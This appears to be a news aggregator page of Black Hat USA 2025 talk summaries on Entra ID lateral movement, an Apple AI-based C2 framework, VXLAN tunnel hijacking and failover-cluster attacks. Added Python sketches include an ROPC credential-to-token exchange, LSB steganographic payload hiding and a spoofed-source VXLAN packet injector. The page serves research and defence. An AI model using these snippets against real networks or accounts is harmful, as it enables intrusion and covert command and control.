The Cyber Stream
Latest News for Cyber Security & Technology
Wednesday, 18 February 2026
Join Black Hat USA Review Board Members for a compelling discussion on the most pressing issues facing the InfoSec community today. This distinguished panel will analyze key conference takeaways and provide valuable insights on how emerging trends will shape future security strategies. Don't miss this opportunity to hear candid perspectives from some of cybersecurity's most influential voices. By: Heather Adkins | Security Engineering Daniel Cuthbert | Global Head of Security Research Aanchal Gupta | Chief Security Officer, Adobe Jason Haddix | CEO, Hacker & Trainer, Arcanum Information Security Jeff Moss | Founder, Black Hat and DEF CON Full Session Details Available at: https://ift.tt/Ne6kX0d
source https://www.youtube.com/watch?v=DmXlafnjn0M
Tuesday, 17 February 2026
Black Hat USA 2025 | Advanced Active Directory to Entra ID Lateral Movement Techniques
Is there a security boundary between Active Directory and Entra ID in a hybrid environment? The answer to this question, while still somewhat unclear, has changed over the past few years as there has been more hardening of how much "the cloud" trusts data from on-premises. The reason for this is that many threat actors, including APTs, have been making use of known lateral movement techniques to compromise the cloud from AD. In this talk, we will take a deep dive together into Entra ID and hybrid AD trust internals. We will introduce several new lateral movement techniques that allow us to bypass authentication and MFA and stealthily exfiltrate data using on-premises AD as a starting point, even in environments where the classic techniques do not work. All of these techniques are new; they are not really vulnerabilities but part of the design. Several of them have been remediated with recent hardening efforts by Microsoft. Very few of them leave useful logs behind when abused. As you would expect, none of these "features" are documented. Join me for a wild ride into Entra ID internals, undocumented authentication flows and tenant compromise from on-premises AD. By: Dirk-jan Mollema | Security Researcher, Outsider Security Presentation Materials Available at: https://ift.tt/X4g86EP
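For reference, the classic on-premises-to-cloud pivot that recent hardening targets is simply trading AD-synced credentials for Entra ID tokens. The sketch below shows the publicly documented OAuth 2.0 resource owner password credentials (ROPC) flow against the Microsoft identity platform; it is not one of the new techniques from this talk, and the tenant, client ID, and account are placeholders. MFA and Conditional Access will normally block this path, which is exactly why the newer, design-level techniques matter.
```python
# Minimal sketch of the documented ROPC flow: exchanging AD-synced credentials
# for an Entra ID access token. Placeholders only; this is NOT one of the
# talk's techniques, and MFA/Conditional Access will usually block it.
import requests

TENANT = "contoso.onmicrosoft.com"                    # placeholder tenant
CLIENT_ID = "00000000-0000-0000-0000-000000000000"    # placeholder public client ID

resp = requests.post(
    f"https://login.microsoftonline.com/{TENANT}/oauth2/v2.0/token",
    data={
        "grant_type": "password",                     # ROPC grant
        "client_id": CLIENT_ID,
        "scope": "https://graph.microsoft.com/.default",
        "username": "user@contoso.com",               # placeholder account
        "password": "REDACTED",
    },
    timeout=30,
)
resp.raise_for_status()
token = resp.json()["access_token"]
print(token[:40], "...")                              # a token here proves the AD-to-cloud pivot
```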
source https://www.youtube.com/watch?v=rzfAutv6sB8
Friday, 13 February 2026
Black Hat USA 2025 | Keynote: Threat Modeling and Constitutional Law
The legal system is terrible at threat modeling. It trusts the wrong insiders, overreacts to outsider threats, and is stodgy and sclerotic when circumstances shift. In this talk, Jennifer Granick examines constitutional law doctrines' longstanding mistakes in threat modeling—mistakes that civil libertarians have warned about for years. These missteps make it particularly difficult for Congress, the Courts, and the public to navigate the evolving legal and political landscape ushered in by the Trump Administration. By: Jennifer Granick | Surveillance and Cybersecurity Counsel, ACLU Full Session Details Available at: https://ift.tt/y7hK3XE
source https://www.youtube.com/watch?v=H0bM5q5TtC0
Wednesday, 21 January 2026
Your Traffic Doesn't Lie: Unmasking Supply Chain Attacks via Application Behaviour
Supply chain compromises like the 2020 SolarWinds breach have shown how devastating and stealthy these attacks can be. Despite advances in provenance checks (e.g., SLSA), SBOMs, and vendor vetting, organizations still struggle to detect compromises that arrive via trusted apps. In this talk, we unveil BEAM (Behavioral Evaluation of Application Metrics), an open source tool that contains a novel technique for detecting supply chain attacks purely from web traffic—no endpoint agents, no code instrumentation, just insights from the network data you're probably already collecting. We trained BEAM using over 40 billion HTTP/HTTPS transactions across thousands of global organizations. By applying LLMs to map user agents to specific apps, extracting 65 behavioral signals, and building application-specific baselines, BEAM detects deviations with over 95% accuracy—and up to 99% for highly predictable applications. It's fast, automated, and doesn't rely on vendor cooperation or manual tuning. We'll walk through how BEAM works under the hood: from enriching noisy traffic data to behavioral modeling and surfacing anomalies that reveal active compromises. Alongside prebuilt models for eight popular applications, we'll also show how organizations can build custom models for internal apps, enabling scalable monitoring for both off-the-shelf and bespoke software. This approach is new, highly effective, and purpose-built for threats that continue to bypass traditional defenses. By focusing on how applications behave—not just who built them or where they came from—BEAM gives defenders a powerful new signal for catching a class of threats that has been difficult to defend against. This session includes a live demo and practical takeaways for defenders, researchers, and security engineers alike. By: Colin Estep | Principal Engineer, Netskope Dagmawi Mulugeta | Staff Threat Research Engineer, Netskope Presentation Materials Available at: https://ift.tt/pAB1ezW
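BEAM is open source, so the authoritative implementation is the tool itself; the toy sketch below only illustrates the general idea of per-application behavioral baselining over HTTP transaction logs. The column names, the three features, and the z-score threshold are assumptions, not BEAM's actual 65 signals or model.
```python
# Toy per-application behavioral baselining over HTTP transaction logs.
# Illustrative only: the schema, features, and threshold are assumptions,
# not BEAM's actual signals or model.
import pandas as pd

# Assumed log schema: timestamp, app, bytes_out, request_count, distinct_hosts
logs = pd.read_csv("http_transactions.csv", parse_dates=["timestamp"])

# Aggregate per app per hour into a few simple behavioral features.
hourly = (
    logs.set_index("timestamp")
        .groupby("app")
        .resample("1h")
        .agg({"bytes_out": "sum", "request_count": "sum", "distinct_hosts": "max"})
        .reset_index()
)

# Baseline = per-app mean/std of each feature; flag hours that deviate strongly.
features = ["bytes_out", "request_count", "distinct_hosts"]
means = hourly.groupby("app")[features].transform("mean")
stds = hourly.groupby("app")[features].transform("std").fillna(0) + 1e-9
hourly["score"] = ((hourly[features] - means) / stds).abs().max(axis=1)

# Hours where an app behaves far outside its own baseline are candidates for review.
print(hourly[hourly["score"] > 4][["app", "timestamp", "score"]])
```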
source https://www.youtube.com/watch?v=UGB5W-yJCrQ
Wednesday, 7 January 2026
Weaponizing Apple AI for Offensive Operations
Apple's on-device AI frameworks (CoreML, Vision, AVFoundation) enable powerful automation and advanced media processing. However, these same capabilities introduce a stealthy attack surface that allows for payload execution, covert data exchange, and fully AI-assisted command and control operations. This talk introduces MLArc, a CoreML-based C2 framework that abuses Apple's AI processing pipeline for payload embedding, execution, and real-time attacker-controlled communication. By leveraging machine learning models, image processing APIs, and macOS native AI features, attackers can establish a fully functional AI-assisted C2 without relying on traditional execution mechanisms or external dependencies. Beyond MLArc as a standalone C2, this talk explores how Apple's AI frameworks can be weaponized to enhance existing C2s like Mythic, providing stealthy AI-assisted payload delivery, execution, and persistence. The Apple AI frameworks used for embedding the Apfell payload are listed below.
CoreML - Embedding and executing encrypted shellcode inside AI models.
Vision - Concealing payloads/encryption keys inside AI-processed images and retrieving them dynamically to bypass detection.
AVFoundation - Hiding and extracting payloads within high-frequency AI-enhanced audio files using steganographic techniques.
This research marks the first public disclosure of Apple AI-assisted payload execution and AI-driven C2 on macOS, revealing a new class of offensive tradecraft that weaponizes Apple AI pipelines for adversarial operations. I will demonstrate MLArc in action, showing how Apple's AI stack can be abused to establish fileless, stealthy C2 channels that evade traditional security measures. This talk is highly technical, delivering new research and attack techniques that impact macOS security, Apple AI exploitation, and red team tradecraft. By: Hariharan Shanmugam | Lead Red Teamer Full Session Details Available at: https://ift.tt/d6lYhvI
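For context on the concealment side, the sketch below is a generic least-significant-bit image steganography example; it is not MLArc and not the Vision- or CoreML-specific techniques from the talk, only an illustration of how a small payload or key can ride inside an innocuous-looking image. The file names and payload are placeholders, and a lossless format such as PNG is required since lossy re-encoding destroys the embedded bits.
```python
# Generic LSB steganography sketch (illustrative only; not MLArc and not the
# Vision/CoreML techniques from the talk). Hides a short byte string in the
# least significant bit of each red channel value of a PNG.
from PIL import Image

def embed(cover_path: str, out_path: str, payload: bytes) -> None:
    img = Image.open(cover_path).convert("RGB")
    pixels = list(img.getdata())
    # Prefix the payload with a 4-byte big-endian length, then serialize to bits.
    bits = "".join(f"{b:08b}" for b in len(payload).to_bytes(4, "big") + payload)
    if len(bits) > len(pixels):
        raise ValueError("cover image too small for payload")
    out = []
    for i, (r, g, b) in enumerate(pixels):
        if i < len(bits):
            r = (r & ~1) | int(bits[i])   # overwrite the red channel's LSB
        out.append((r, g, b))
    stego = Image.new("RGB", img.size)
    stego.putdata(out)
    stego.save(out_path, "PNG")           # lossless format preserves the bits

def extract(stego_path: str) -> bytes:
    pixels = list(Image.open(stego_path).convert("RGB").getdata())
    bits = [str(p[0] & 1) for p in pixels]
    length = int("".join(bits[:32]), 2)
    body = "".join(bits[32:32 + length * 8])
    return bytes(int(body[i:i + 8], 2) for i in range(0, len(body), 8))

embed("cover.png", "stego.png", b"demo-key-material")
print(extract("stego.png"))
```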
source https://www.youtube.com/watch?v=UooCY59nQSQ
Tuesday, 6 January 2026
From Spoofing to Tunneling: New Red Team's Networking Techniques for Initial Access and Evasion
Gaining initial access to an intranet is one of the most challenging parts of red teaming. If an attack chain is intercepted by an incident response team, the entire operation must be restarted. In this talk, we introduce a technique for gaining initial access to an intranet that does not involve phishing, exploiting public-facing applications, or having a valid account. Instead, we leverage stateless tunnels, such as GRE and VxLAN, which are widely used by companies like Cloudflare and Amazon. This technique affects not only Cloudflare's customers but also other companies. Additionally, we will share evasion techniques that take advantage of company intranets that do not implement source IP filtering, preventing IR teams from intercepting the full attack chain. Red teamers could confidently perform password spraying within an internal network without worrying about losing a compromised foothold. We will also reveal a nightmare in the VxLAN implementations of the Linux kernel and RouterOS. It affects many companies, including ISPs. This feature is enabled by default and allows anyone to hijack the entire tunnel, granting intranet access, even if the VxLAN is configured on a private IP interface through an encrypted tunnel. What's worse, RouterOS users cannot disable this feature. The problem can be triggered simply by following the official VxLAN tutorial. Furthermore, if the tunnel runs routing protocols like BGP or OSPF, it can lead to the hijacking of internal IPs, which could result in domain compromises. We will demonstrate the attack vectors that red teamers can exploit after hijacking a tunnel or compromising a router by manipulating the routing protocols. Lastly, we will conclude the presentation by showing how companies can mitigate these vulnerabilities. Red teamers can use these techniques and tools to scan targets and access company intranets. This approach opens new avenues for further research. By: Shu-Hao Tung | Threat Researcher, Trend Micro Presentation Materials Available at: https://ift.tt/2ldANpQ
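To make the core issue concrete, the scapy sketch below builds a VXLAN-in-UDP frame whose outer source address is simply claimed rather than verified; because the tunnel is stateless and unauthenticated, a VTEP that does not filter outer source IPs has nothing else to validate. The addresses, VNI, and ports are placeholders, and this only illustrates the encapsulation, not the full techniques from the talk.
```python
# Illustration of why stateless, unauthenticated encapsulation is risky:
# a VXLAN frame whose outer source IP is simply claimed, not verified.
# All addresses and the VNI are placeholders; only test against your own lab.
from scapy.all import Ether, IP, UDP, send
from scapy.layers.vxlan import VXLAN

OUTER_SRC = "198.51.100.10"   # spoofed "trusted" tunnel endpoint
OUTER_DST = "203.0.113.20"    # target VTEP
VNI = 100                     # guessed/known VXLAN network identifier

# Arbitrary inner Ethernet/IP packet that will pop out inside the overlay.
inner = (Ether(src="02:00:00:00:00:01", dst="ff:ff:ff:ff:ff:ff")
         / IP(src="10.0.0.99", dst="10.0.0.1")
         / UDP(sport=40000, dport=53))

frame = (IP(src=OUTER_SRC, dst=OUTER_DST)
         / UDP(sport=54321, dport=4789)   # 4789 = standard VXLAN port
         / VXLAN(vni=VNI)
         / inner)

# Requires raw-socket privileges.
send(frame, verbose=False)
```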
source https://www.youtube.com/watch?v=terPgwzk3dc
Monday, 5 January 2026
Clustered Points of Failure - Attacking Windows Server Failover Clusters
Windows Server Failover Cluster (WSFC) implementations represent a critical yet underexamined attack surface in enterprise environments. This research exposes how WSFC's architectural design inadvertently creates exploitable abuse paths and presents novel attack methodologies demonstrating how the compromise of a single cluster node can lead to complete cluster takeover, lateral movement across clustered infrastructure, and ultimately, domain compromise. This Briefing will present previously undiscovered techniques for extracting and leveraging cluster credentials, manipulating Kerberos authentication, and exploiting excessive permissions granted to cluster objects. This "set it and forget it" high-availability infrastructure represents a significant blind spot for organizations. You will leave with a better understanding of WSFC's internal security architecture, strategies for enumerating and abusing these new attack paths, and concrete defensive guidance for protecting organizations from these new abuses. By: Garrett Foster | Senior Security Researcher, SpecterOps, Inc.
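As a hedged starting point for the enumeration side, the sketch below uses ldap3 to look for AD computer objects carrying a service principal name commonly registered on Cluster Name Objects. The server, credentials, base DN, and SPN pattern are assumptions to adapt to your environment; this is not the presenter's tooling.
```python
# Hedged sketch: enumerate AD computer objects that look like failover-cluster
# objects via an SPN pattern commonly seen on Cluster Name Objects (CNOs).
# Server, credentials, base DN, and the SPN filter are placeholders/assumptions.
from ldap3 import Server, Connection, NTLM, SUBTREE, ALL

server = Server("dc01.corp.example", get_info=ALL)
conn = Connection(server, user="CORP\\auditor", password="REDACTED",
                  authentication=NTLM, auto_bind=True)

# Assumed SPN pattern for cluster name objects; adjust for your environment.
search_filter = "(&(objectClass=computer)(servicePrincipalName=MSClusterVirtualServer/*))"
conn.search(search_base="DC=corp,DC=example",
            search_filter=search_filter,
            search_scope=SUBTREE,
            attributes=["name", "servicePrincipalName"])

for entry in conn.entries:
    # Review who can write to these objects: over-permissive ACLs on cluster
    # objects are one of the abuse paths this Briefing discusses.
    print(entry.name, entry.servicePrincipalName)
```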
source https://www.youtube.com/watch?v=FSRmPwfMYs0
Friday, 2 January 2026
Out Of Control: How KCFG and KCET Redefine Control Flow Integrity in the Windows Kernel
Virtual Secure Mode, or VSM, on Windows marked the most significant leap in security innovation in quite some time, allowing the hypervisor to provide unprecedented protection to the Windows OS. With VSM features like Credential Guard, which prevents in-memory credential theft, and Hypervisor-Protected Code Integrity (HVCI), which protects against unsigned kernel-mode code, VSM has significantly reshaped the way many offensive security practitioners and threat actors alike think about tradecraft. In the exploitation world, similar shifts have occurred with both Control Flow Guard (CFG) and Intel Control Flow Enforcement Technology (CET) being readily available in user mode. However, we don't hear or read much about their kernel-mode counterparts, KCFG and KCET. Why is this, if CFG and CET are both relatively well-established exploit mitigations in user mode? At the time CFG was first released in user mode, kernel mode was the highest security boundary available on Windows – therefore making the implementation of CFG, or any CFI mitigation, in kernel mode impossible. However, since we now have a higher security boundary on Windows, thanks to the hypervisor, it is now possible to robustly implement CFG and CET in the Windows kernel! This talk will cover what kernel-mode CFI would look like without the presence of a hypervisor; why KCFG and KCET rely on VTL 1; how these mitigations differ from their user-mode counterparts; known limitations which exist today, including the recent deprecation of the next iteration of CFG known as eXtended Control Flow Guard (XFG); and the future of kernel-mode exploitation on Windows in the presence of KCFG and KCET. By: Connor McGarr | Software Engineer, Prelude Security Presentation Materials Available at: https://ift.tt/5jlwhHR
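Because KCFG and KCET depend on the hypervisor and VTL 1, a quick first check on any given host is whether VBS and HVCI are even configured. The registry locations in the sketch below are the commonly documented ones, but treat them as an assumption; msinfo32 or the Win32_DeviceGuard WMI class gives the authoritative running state.
```python
# Quick check of VBS/HVCI prerequisites on Windows via commonly documented
# registry values. These reflect configuration, not guaranteed running state;
# msinfo32 / Win32_DeviceGuard is authoritative.
import winreg

def read_dword(path: str, name: str):
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
            value, _ = winreg.QueryValueEx(key, name)
            return value
    except OSError:
        return None  # key/value absent: feature not configured here

vbs = read_dword(r"SYSTEM\CurrentControlSet\Control\DeviceGuard",
                 "EnableVirtualizationBasedSecurity")
hvci = read_dword(r"SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios"
                  r"\HypervisorEnforcedCodeIntegrity", "Enabled")

print(f"VBS configured:  {vbs}")
print(f"HVCI configured: {hvci}")
```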
source https://www.youtube.com/watch?v=LflYlvJ4vSU
Monday, 22 December 2025
Keynote: From Script Kiddie to Cyber Kingpin: Preventing the Predictable Progression
What the cruelest hack in history can teach us about the pathway to serious cybercrime. The Vastaamo hack shocked the world, but when the hacker behind it was unmasked, it came as no surprise. What can the story of Julius Kivimaki teach us about teenage hacking culture, and how can we end the cycle? It's a problem that has come back to the fore with high-profile hacks from Scattered Spider, as cyber correspondent and author Joe Tidy explains in this keynote talk. By: Joe Tidy | Cyber Correspondent, BBC Full Session Details Available at: https://ift.tt/m5A48ak
source https://www.youtube.com/watch?v=TPMXnZihZxg
Friday, 19 December 2025
AppleStorm - Unmasking the Privacy Risks of Apple Intelligence
Apple Intelligence, Apple's newest AI product, is designed to enhance productivity with AI while maintaining Apple's focus on user experience and privacy, often highlighting its use of local, on-device models combined with its Private Cloud Compute as a key advantage. But how well do these assurances hold up under scrutiny? While Apple emphasizes privacy as a core principle, my findings challenge some of these claims, illustrating the importance of scrutinizing AI-driven assistants before widespread adoption. In this talk, we take a closer look at the data flows within Apple Intelligence, examining how it interacts with user data and the potential security and privacy risks that come with it. Using traffic analysis and OS inspection techniques, we explore many of the different flows within Apple Intelligence and answer: what information is accessed, how it moves through the system, and if and where it gets transmitted. We'll explore various interactions and features of Apple Intelligence. We'll show how some features are processed locally on the device, while others involve transmitting data to Apple's servers. While some of these data flows are legitimate and necessary, others raise privacy concerns that Apple has acknowledged. Covering topics from encrypted traffic to potential data leaks, this presentation offers practical insights for both users and security professionals. By: Yoav Magid | Senior Security Researcher, Lumia Security Presentation Materials Available at: https://ift.tt/6OVBzau
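The methodology here is traffic analysis plus OS inspection; as a generic starting point rather than the author's tooling, the scapy sketch below passively logs DNS queries from a test device so you can see which Apple endpoints are contacted while exercising an Apple Intelligence feature. The interface name and domain suffixes are assumptions.
```python
# Generic starting point for traffic analysis (not the author's tooling):
# passively log DNS queries so you can see which endpoints a test device
# contacts while exercising Apple Intelligence features.
# Interface name and domain suffixes are assumptions; requires capture privileges.
from scapy.all import sniff, DNS, DNSQR

WATCH_SUFFIXES = (b"apple.com.", b"icloud.com.")  # adjust for your analysis

def log_query(pkt):
    # Only look at DNS queries (qr == 0) that carry a question record.
    if pkt.haslayer(DNSQR) and pkt[DNS].qr == 0:
        qname = pkt[DNSQR].qname
        if qname.endswith(WATCH_SUFFIXES):
            print(qname.decode(errors="replace"))

# Capture DNS traffic on the interface facing the test device.
sniff(iface="en0", filter="udp port 53", prn=log_query, store=False)
```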
source https://www.youtube.com/watch?v=iL2McWODDnc